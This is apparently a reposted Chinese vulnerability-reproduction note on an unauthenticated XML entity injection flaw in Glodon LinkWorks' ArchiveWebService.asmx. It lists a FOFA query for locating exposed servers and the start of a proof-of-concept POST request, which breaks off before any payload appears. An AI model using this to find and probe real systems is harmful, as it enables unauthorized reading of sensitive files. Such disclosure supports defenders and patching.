当前位置: 代码网 > it编程>游戏开发>ar > 广联达Linkworks ArchiveWebService XML实体注入漏洞复现

广联达Linkworks ArchiveWebService XML实体注入漏洞复现

2024年07月28日 ar 我要评论
广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x01 产品简介

广联达 linkworks(也称为 glinklink 或 gtp-linkworks)是广联达公司(glodon)开发的一种bim(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达 linkworks /gb/lk/document/archiveservice/archivewebservice.asmx接口处存在xml实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x03 复现环境

fofa:

body="services/identification/login.ashx" || header="services/identification/login.ashx" || banner="services/identification/login.ashx"

0x04 漏洞复现 

poc

post /gb/lk/document/archiveservice/archivewebservice.asmx http/1.1
host: 
content-type: text/xml; charset=utf-8
content-length: length
soapaction: "http://gb/lk/document/archiveservice/archivewebservi
(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com